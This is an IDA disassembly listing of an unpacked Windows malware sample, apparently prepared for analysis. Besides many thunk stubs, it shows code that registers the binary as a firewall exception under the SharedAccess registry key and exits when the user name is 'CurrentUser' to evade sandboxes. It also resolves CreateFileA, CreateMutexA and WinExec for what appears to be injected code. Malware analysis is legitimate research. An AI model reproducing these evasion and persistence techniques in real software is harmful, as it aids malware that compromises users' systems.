;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 1FD3385A95D48A550702029EF44A7F5B
; File Name : u:\work\1fd3385a95d48a550702029ef44a7f5b_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00079000 ( 495616.)
; Section size in file : 00079000 ( 495616.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 401000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
db 5 dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401005 proc near ; CODE XREF: UPX0:00403B62�p
jmp sub_4044FE
sub_401005 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40100A proc near ; CODE XREF: UPX0:0040B839�p
jmp sub_40B47F
sub_40100A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40100F proc near ; CODE XREF: sub_406F72+182�p
jmp sub_401A85
sub_40100F endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401014 proc near ; CODE XREF: sub_4037AE+26�p
jmp sub_402EA5
sub_401014 endp
; ---------------------------------------------------------------------------
jmp loc_4097EA
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40101E proc near ; CODE XREF: UPX0:0040AFDE�p
jmp sub_40AB4C
sub_40101E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401023 proc near ; CODE XREF: sub_401A85+A4�p
; sub_406B46+E9�p
jmp sub_401B8B
sub_401023 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401028 proc near ; CODE XREF: UPX0:00403A3B�p
jmp sub_40B179
sub_401028 endp
; ---------------------------------------------------------------------------
loc_40102D: ; CODE XREF: UPX0:004037A7�j
jmp loc_403C83
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401032 proc near ; CODE XREF: UPX0:00403B06�p
; sub_40814F+F�p
jmp sub_405329
sub_401032 endp
; ---------------------------------------------------------------------------
jmp loc_4077DA
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40103C proc near ; CODE XREF: sub_4037AE+E9�p
jmp sub_401613
sub_40103C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401041 proc near ; DATA XREF: sub_401B8B+442�o
; sub_401B8B+A11�o
jmp loc_4030F8
sub_401041 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401046 proc near ; CODE XREF: UPX0:00403AF7�p
jmp sub_40532D
sub_401046 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40104B proc near ; CODE XREF: sub_401A85+C2�p
; sub_401B8B+269�p ...
jmp sub_4048F0
sub_40104B endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401050 proc near ; DATA XREF: sub_4073C0+A6�o
jmp sub_40739D
sub_401050 endp
; ---------------------------------------------------------------------------
loc_401055: ; DATA XREF: UPX0:00403AA5�o
jmp loc_40B8B1
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40105A proc near ; CODE XREF: sub_402EA5+18�p
; sub_402EA5+30�p ...
jmp sub_402C2A
sub_40105A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40105F proc near ; CODE XREF: sub_40890C+12�p
jmp sub_408812
sub_40105F endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401064 proc near ; DATA XREF: sub_4073C0+4B�o
jmp sub_407273
sub_401064 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401069 proc near ; CODE XREF: sub_401613+C9�p
; sub_4037AE+C8�p ...
jmp sub_407F71
sub_401069 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40106E proc near ; CODE XREF: sub_401B8B+AFE�p
; sub_408AB4+12�p ...
jmp sub_408A19
sub_40106E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401073 proc near ; CODE XREF: sub_40186B+177�p
; sub_401B8B+42B�p ...
jmp sub_408976
sub_401073 endp
; ---------------------------------------------------------------------------
jmp loc_404AC3
; ---------------------------------------------------------------------------
loc_40107D: ; CODE XREF: UPX0:0040378C�j
jmp loc_403C60
; ---------------------------------------------------------------------------
jmp loc_409201
; ---------------------------------------------------------------------------
jmp loc_404AED
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40108C proc near ; CODE XREF: sub_404BA1+44�p
jmp sub_404F82
sub_40108C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401091 proc near ; CODE XREF: sub_40965C+3F�j
jmp loc_409456
sub_401091 endp
; ---------------------------------------------------------------------------
jmp loc_4097D8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40109B proc near ; CODE XREF: sub_40419B+4B�p
jmp sub_40487C
sub_40109B endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010A0 proc near ; CODE XREF: sub_401B8B+6C3�p
; sub_40B179+6B�p
jmp sub_40A87B
sub_4010A0 endp
; ---------------------------------------------------------------------------
jmp loc_40873A
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010AA proc near ; CODE XREF: UPX0:0040395A�p
; UPX0:00407B82�p ...
jmp sub_407E71
sub_4010AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010AF proc near ; CODE XREF: sub_401B8B+4DA�p
; sub_40A9CB+27�p ...
jmp sub_408DD2
sub_4010AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010B4 proc near ; DATA XREF: sub_4073C0+17�o
jmp sub_406B46
sub_4010B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010B9 proc near ; DATA XREF: sub_4073C0+28�o
jmp sub_406EA7
sub_4010B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010BE proc near ; CODE XREF: UPX0:004039B9�p
jmp sub_40186B
sub_4010BE endp
; ---------------------------------------------------------------------------
jmp loc_407B11
; ---------------------------------------------------------------------------
jmp loc_408596
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010CD proc near ; CODE XREF: sub_401B8B+ABA�p
; UPX0:loc_403B96�p ...
jmp sub_408AB4
sub_4010CD endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010D2 proc near ; CODE XREF: UPX0:004049B2�p
; sub_406B46+187�p ...
jmp sub_4093BF
sub_4010D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010D7 proc near ; CODE XREF: UPX0:00403AEA�p
jmp sub_4073C0
sub_4010D7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010DC proc near ; CODE XREF: UPX0:004068CE�p
jmp sub_40670F
sub_4010DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010E1 proc near ; DATA XREF: sub_409D61:loc_40A150�o
jmp sub_406776
sub_4010E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010E6 proc near ; CODE XREF: sub_406F72+D3�p
jmp sub_402E76
sub_4010E6 endp
; ---------------------------------------------------------------------------
jmp loc_4076C5
; ---------------------------------------------------------------------------
jmp loc_409141
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010F5 proc near ; CODE XREF: sub_40AD1A+58�p
jmp sub_40A9CB
sub_4010F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010FA proc near ; CODE XREF: sub_406EA7+77�p
; UPX0:004071F1�p ...
jmp sub_404A3B
sub_4010FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010FF proc near ; CODE XREF: sub_406F72+C4�p
jmp sub_409100
sub_4010FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401104 proc near ; CODE XREF: UPX0:00403B5B�p
jmp sub_4042A3
sub_401104 endp
; ---------------------------------------------------------------------------
jmp loc_4076A4
; ---------------------------------------------------------------------------
loc_40110E: ; DATA XREF: UPX0:00403A6D�o
jmp loc_40B7A2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401113 proc near ; CODE XREF: sub_406B46+1A1�p
jmp sub_4040D9
sub_401113 endp
; ---------------------------------------------------------------------------
jmp loc_409750
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40111D proc near ; CODE XREF: UPX0:00407B56�p
jmp sub_407BCA
sub_40111D endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401122 proc near ; DATA XREF: sub_407273+6F�o
jmp loc_4068C5
sub_401122 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401127 proc near ; CODE XREF: UPX0:0040B91B�p
jmp sub_40860A
sub_401127 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40112C proc near ; CODE XREF: sub_406B46+AA�p
; sub_406B46:loc_406C3E�p ...
jmp sub_405325
sub_40112C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401131 proc near ; CODE XREF: sub_409D61+48B�p
; sub_40B30A+62�p
jmp sub_40B2E9
sub_401131 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401136 proc near ; DATA XREF: sub_4073C0+69�o
jmp sub_40731E
sub_401136 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40113B proc near ; CODE XREF: sub_401B8B+C8C�p
; sub_403F2A+62�p
jmp sub_403FFF
sub_40113B endp
; ---------------------------------------------------------------------------
jmp loc_402BDF
; ---------------------------------------------------------------------------
jmp loc_4075A5
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40114A proc near ; CODE XREF: sub_406B46+1EB�p
jmp sub_403EB0
sub_40114A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40114F proc near ; CODE XREF: sub_40A587+57�p
jmp sub_4066DC
sub_40114F endp
; ---------------------------------------------------------------------------
jmp loc_409993
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401159 proc near ; CODE XREF: sub_404BA1+1B�p
jmp sub_404CEA
sub_401159 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40115E proc near ; DATA XREF: sub_401B8B+BCD�o
jmp loc_408C4A
sub_40115E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401163 proc near ; CODE XREF: UPX0:0040999C�p
jmp sub_409897
sub_401163 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401168 proc near ; CODE XREF: UPX0:0040762C�p
jmp sub_4074A8
sub_401168 endp
; ---------------------------------------------------------------------------
jmp loc_405331
; ---------------------------------------------------------------------------
loc_401172: ; DATA XREF: sub_4073C0+7A�o
jmp loc_40716D
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401177 proc near ; CODE XREF: sub_407BCA+15E�p
jmp sub_407924
sub_401177 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40117C proc near ; CODE XREF: sub_404BA1:loc_404BEC�p
jmp sub_404C0F
sub_40117C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401181 proc near ; DATA XREF: sub_4073C0+6�o
jmp sub_4073BD
sub_401181 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401186 proc near ; CODE XREF: UPX0:0040BB6D�p
jmp sub_4086B2
sub_401186 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40118B proc near ; CODE XREF: sub_404BA1+27�p
jmp sub_404C66
sub_40118B endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401190 proc near ; CODE XREF: sub_404BA1+F�p
jmp sub_404D74
sub_401190 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401195 proc near ; CODE XREF: sub_40739D+12�p
jmp sub_4052FB
sub_401195 endp
; ---------------------------------------------------------------------------
jmp loc_4099FA
; ---------------------------------------------------------------------------
jmp loc_407666
; ---------------------------------------------------------------------------
jmp loc_404A6A
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011A9 proc near ; CODE XREF: sub_401A85+3B�p
; sub_406B46+2A�p ...
jmp sub_408E28
sub_4011A9 endp
; ---------------------------------------------------------------------------
jmp loc_40A541
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011B3 proc near ; CODE XREF: sub_4037AE+A�p
jmp sub_401727
sub_4011B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011B8 proc near ; CODE XREF: UPX0:004071D1�p
jmp sub_404B7C
sub_4011B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011BD proc near ; CODE XREF: sub_4037AE+D4�p
; sub_4037AE+104�p
jmp sub_40829C
sub_4011BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011C2 proc near ; CODE XREF: sub_4042A3+10B�p
; sub_4042A3+11E�p ...
jmp sub_403D53
sub_4011C2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011C7 proc near ; CODE XREF: sub_401B8B+CDF�p
; sub_4045CE+C9�p
jmp sub_403F2A
sub_4011C7 endp
; ---------------------------------------------------------------------------
jmp loc_4040FD
; ---------------------------------------------------------------------------
jmp loc_404964
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011D6 proc near ; CODE XREF: sub_409D61+4A3�p
jmp sub_40B30A
sub_4011D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011DB proc near ; CODE XREF: sub_4045CE+B0�p
; sub_406B46+9F�p ...
jmp sub_404069
sub_4011DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011E0 proc near ; CODE XREF: sub_403E24+3E�p
jmp sub_403DB3
sub_4011E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011E5 proc near ; CODE XREF: sub_408B52+3B�p
; sub_408B52+4A�p
jmp sub_408696
sub_4011E5 endp
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011EF proc near ; CODE XREF: UPX0:0040397B�p
jmp sub_408E8A
sub_4011EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011F4 proc near ; DATA XREF: sub_4081D8+12�o
jmp sub_40814F
sub_4011F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011F9 proc near ; DATA XREF: sub_40A9CB+B4�o
jmp sub_40BC82
sub_4011F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011FE proc near ; CODE XREF: sub_401B8B+721�p
jmp sub_4053A0
sub_4011FE endp
; ---------------------------------------------------------------------------
jmp loc_404A94
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401208 proc near ; CODE XREF: sub_404BA1+33�p
jmp sub_404EB9
sub_401208 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40120D proc near ; CODE XREF: sub_4044FE+55�p
jmp sub_40457E
sub_40120D endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401212 proc near ; CODE XREF: UPX0:004039AC�p
; sub_4079A2+AA�p
jmp sub_4079A2
sub_401212 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401217 proc near ; CODE XREF: sub_401B8B+C5C�p
; UPX0:004035C1�p ...
jmp sub_40443D
sub_401217 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40121C proc near ; CODE XREF: sub_40829C:loc_408325�p
jmp sub_40836C
sub_40121C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401221 proc near ; CODE XREF: sub_408BBE+18�p
jmp sub_408AF2
sub_401221 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401226 proc near ; CODE XREF: sub_40186B+162�p
; sub_401B8B+331�p ...
jmp sub_408DF8
sub_401226 endp
; ---------------------------------------------------------------------------
jmp loc_409ACC
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401230 proc near ; CODE XREF: sub_4093BF+3C�p
jmp sub_4092BF
sub_401230 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401235 proc near ; CODE XREF: UPX0:004031D3�p
; UPX0:00403621�p ...
jmp sub_408B52
sub_401235 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40123A proc near ; CODE XREF: UPX0:0040AFF6�p
jmp sub_40AC0B
sub_40123A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40123F proc near ; CODE XREF: sub_404F82+2F�p
jmp sub_405186
sub_40123F endp
; ---------------------------------------------------------------------------
jmp loc_407887
; ---------------------------------------------------------------------------
loc_401249: ; DATA XREF: sub_4081D8+74�o
jmp loc_4083D7
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40124E proc near ; CODE XREF: sub_406EA7+83�p
jmp sub_404A11
sub_40124E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401253 proc near ; CODE XREF: sub_4073C0+12�p
; sub_4073C0+23�p ...
jmp sub_403E24
sub_401253 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401258 proc near ; DATA XREF: sub_4037AE+3D�o
jmp sub_4081D8
sub_401258 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40125D proc near ; DATA XREF: UPX0:004083E3�o
jmp loc_403902
sub_40125D endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401262 proc near ; CODE XREF: UPX0:0040C659�p
jmp sub_4037AE
sub_401262 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401267 proc near ; CODE XREF: sub_404B7C+14�p
; sub_40731E+5C�p
jmp sub_404B21
sub_401267 endp
; ---------------------------------------------------------------------------
jmp loc_4096B2
; ---------------------------------------------------------------------------
loc_401271: ; DATA XREF: sub_40AD1A+10A�o
jmp loc_40AF69
; ---------------------------------------------------------------------------
jmp loc_407DDE
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40127B proc near ; CODE XREF: UPX0:loc_40AFE6�p
jmp sub_40AAF2
sub_40127B endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401280 proc near ; CODE XREF: sub_40890C+47�p
jmp sub_4088DC
sub_401280 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401285 proc near ; CODE XREF: sub_401A85+4E�p
; sub_406B46+56�p
jmp sub_4069AE
sub_401285 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40128A proc near ; CODE XREF: sub_40829C+83�p
jmp sub_408424
sub_40128A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40128F proc near ; CODE XREF: UPX0:00403C8B�p
; sub_403E7C+D�p
jmp sub_403E7C
sub_40128F endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401294 proc near ; CODE XREF: sub_4037AE+F�p
jmp sub_4053A3
sub_401294 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401299 proc near ; DATA XREF: UPX0:00407189�o
jmp loc_403C94
sub_401299 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40129E proc near ; CODE XREF: UPX0:00403B2E�p
; UPX0:00403B3A�p ...
jmp sub_404BA1
sub_40129E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012A3 proc near ; CODE XREF: sub_409D61+4BC�p
jmp sub_40A587
sub_4012A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012A8 proc near ; CODE XREF: UPX0:00403C67�p
; sub_4042A3+B2�p
jmp sub_403FAF
sub_4012A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012AD proc near ; CODE XREF: sub_401B8B+C46�p
; UPX0:004035AB�p ...
jmp sub_40447B
sub_4012AD endp
; ---------------------------------------------------------------------------
jmp loc_4076BF
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012B7 proc near ; CODE XREF: sub_408F96+FD�p
jmp sub_408EA4
sub_4012B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012BC proc near ; CODE XREF: sub_40457E+2C�p
jmp sub_4045CE
sub_4012BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012C1 proc near ; CODE XREF: sub_401B8B+C1D�p
; UPX0:0040359E�p
jmp sub_40965C
sub_4012C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012C6 proc near ; CODE XREF: sub_408A19+53�p
jmp sub_40890C
sub_4012C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012CB proc near ; CODE XREF: UPX0:00407F5F�p
; sub_407F71+1D�p
jmp sub_407FC9
sub_4012CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012D0 proc near ; CODE XREF: sub_401B8B+11B�p
; sub_401B8B+130�p ...
jmp sub_408BBE
sub_4012D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012D5 proc near ; DATA XREF: sub_4073C0+39�o
jmp sub_406F72
sub_4012D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012DA proc near ; CODE XREF: UPX0:0040B0D4�p
; DATA XREF: UPX0:off_412E4C�o
jmp sub_409D61
sub_4012DA endp
; ---------------------------------------------------------------------------
jmp loc_40421F
; ---------------------------------------------------------------------------
jmp loc_408D30
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012E9 proc near ; CODE XREF: sub_401613+5D�p
jmp sub_40176D
sub_4012E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012EE proc near ; CODE XREF: sub_4045CE+1E4�p
jmp sub_40483A
sub_4012EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012F3 proc near ; CODE XREF: sub_406B46+1BE�p
jmp sub_40419B
sub_4012F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012F8 proc near ; DATA XREF: sub_40186B+13B�o
; sub_40186B+155�o
jmp sub_4017DC
sub_4012F8 endp
; ---------------------------------------------------------------------------
jmp loc_407F48
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401302 proc near ; CODE XREF: sub_4037AE+A2�p
jmp sub_408F96
sub_401302 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401307 proc near ; DATA XREF: sub_401B8B+848�o
; sub_40B179+F0�o
jmp sub_40AD1A
sub_401307 endp
; ---------------------------------------------------------------------------
db 307h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401613 proc near ; CODE XREF: sub_40103C�j
var_29C = byte ptr -29Ch
var_29B = byte ptr -29Bh
var_198 = byte ptr -198h
var_197 = byte ptr -197h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_80 = byte ptr -80h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 29Ch
and [ebp+var_198], 0
push edi
push 40h
xor eax, eax
pop ecx
lea edi, [ebp+var_197]
rep stosd
and [ebp+var_29C], 0
push 40h
stosw
stosb
pop ecx
xor eax, eax
lea edi, [ebp+var_29B]
mov [ebp+var_94], 94h
rep stosd
stosw
stosb
lea eax, [ebp+var_94]
push eax
call ds:dword_47B51C ; GetVersionExA
cmp [ebp+arg_0], 0
pop edi
jz short loc_4016E8
lea eax, [ebp+var_198]
push eax
call sub_4012E9
test al, al
pop ecx
jz short loc_4016E8
cmp [ebp+var_90], 5
jnz short loc_4016EC
cmp [ebp+var_8C], 1
jnz short loc_4016EC
lea eax, [ebp+var_80]
push offset a2 ; "2"
push eax
call ds:dword_47B610 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_4016EC
push [ebp+arg_0]
lea eax, [ebp+var_198]
push eax
push offset aSS_0 ; "%s:*:%s"
lea eax, [ebp+var_29C]
push 103h
push eax
call ds:dword_47B620 ; _snprintf
lea eax, [ebp+var_29C]
push 1
push eax
lea eax, [ebp+var_198]
push eax
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Services\\Share"...
push 80000002h
call sub_401069
add esp, 28h
test eax, eax
jnz short loc_4016EC
loc_4016E8: ; CODE XREF: sub_401613+54�j
; sub_401613+65�j
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_4016EC: ; CODE XREF: sub_401613+6E�j
; sub_401613+77�j ...
mov al, 1
leave
retn
sub_401613 endp
; ---------------------------------------------------------------------------
db 37h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401727 proc near ; CODE XREF: sub_4011B3�j
var_44 = byte ptr -44h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 44h
lea eax, [ebp+var_4]
mov [ebp+var_4], 40h
push eax
lea eax, [ebp+var_44]
push eax
call ds:dword_47B408 ; GetUserNameA
lea eax, [ebp+var_44]
push offset aCurrentuser ; "CurrentUser"
push eax
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short locret_40175D
push eax
call ds:dword_47B514 ; ExitProcess
locret_40175D: ; CODE XREF: sub_401727+2D�j
leave
retn
sub_401727 endp
; ---------------------------------------------------------------------------
db 0Eh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40176D proc near ; CODE XREF: sub_4012E9�j
var_104 = byte ptr -104h
var_103 = byte ptr -103h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
and [ebp+var_104], 0
push edi
push 40h
xor eax, eax
pop ecx
lea edi, [ebp+var_103]
rep stosd
stosw
stosb
lea eax, [ebp+var_104]
push 103h
push eax
push 0
call ds:dword_47B518 ; GetModuleHandleA
push eax
call ds:dword_47B510 ; GetModuleFileNameA
lea eax, [ebp+var_104]
push eax
push 104h
push [ebp+arg_0]
call ds:dword_47B620 ; _snprintf
add esp, 0Ch
mov al, 1
pop edi
leave
retn
sub_40176D endp
; ---------------------------------------------------------------------------
db 16h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017DC proc near ; CODE XREF: sub_4012F8�j
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
xor edi, edi
push edi
push 80h
push 3
push edi
lea ebx, [esi+1Ch]
push 1
push 80000000h
push ebx
call dword ptr [esi+4]
mov [ebp+var_4], eax
loc_401802: ; CODE XREF: sub_4017DC+52�j
lea eax, [esi+120h]
push eax
push edi
push edi
call dword ptr [esi+8]
mov [ebp+arg_0], eax
call dword ptr [esi+0Ch]
cmp eax, 0B7h
jnz short loc_401830
push [ebp+arg_0]
call dword ptr [esi+10h]
push [ebp+arg_0]
call dword ptr [esi]
push 0EA60h
call dword ptr [esi+14h]
jmp short loc_401802
; ---------------------------------------------------------------------------
loc_401830: ; CODE XREF: sub_4017DC+3D�j
push [ebp+var_4]
call dword ptr [esi]
push [ebp+arg_0]
call dword ptr [esi+10h]
push [ebp+arg_0]
call dword ptr [esi]
push edi
push ebx
call dword ptr [esi+18h]
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_4017DC endp
; ---------------------------------------------------------------------------
db 1Ch dup(0CCh)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40186B proc near ; CODE XREF: sub_4010BE�j
var_430 = byte ptr -430h
var_32C = dword ptr -32Ch
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = byte ptr -310h
var_20C = byte ptr -20Ch
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 430h
push ebx
push esi
push edi
push offset aKernel32_dll ; "kernel32.dll"
call ds:dword_47B518 ; GetModuleHandleA
mov esi, ds:dword_47B4F8
mov edi, eax
push offset aClosehandle ; "CloseHandle"
push edi
call esi ; dword_47B4F8
push offset aCreatefilea ; "CreateFileA"
push edi
mov [ebp+var_32C], eax
call esi ; dword_47B4F8
push offset aCreatemutexa ; "CreateMutexA"
push edi
mov [ebp+var_328], eax
call esi ; dword_47B4F8
push offset aGetlasterror ; "GetLastError"
push edi
mov [ebp+var_324], eax
call esi ; dword_47B4F8
push offset aReleasemutex ; "ReleaseMutex"
push edi
mov [ebp+var_320], eax
call esi ; dword_47B4F8
push offset aSleep ; "Sleep"
push edi
mov [ebp+var_31C], eax
call esi ; dword_47B4F8
push offset aWinexec ; "WinExec"
push edi
mov [ebp+var_318], eax
call esi ; dword_47B4F8
mov [ebp+var_314], eax
mov ecx, 0C1h
xor eax, eax
lea edi, [ebp+var_310]
rep stosd
lea eax, [ebp+var_C]
xor edi, edi
push eax
push edi
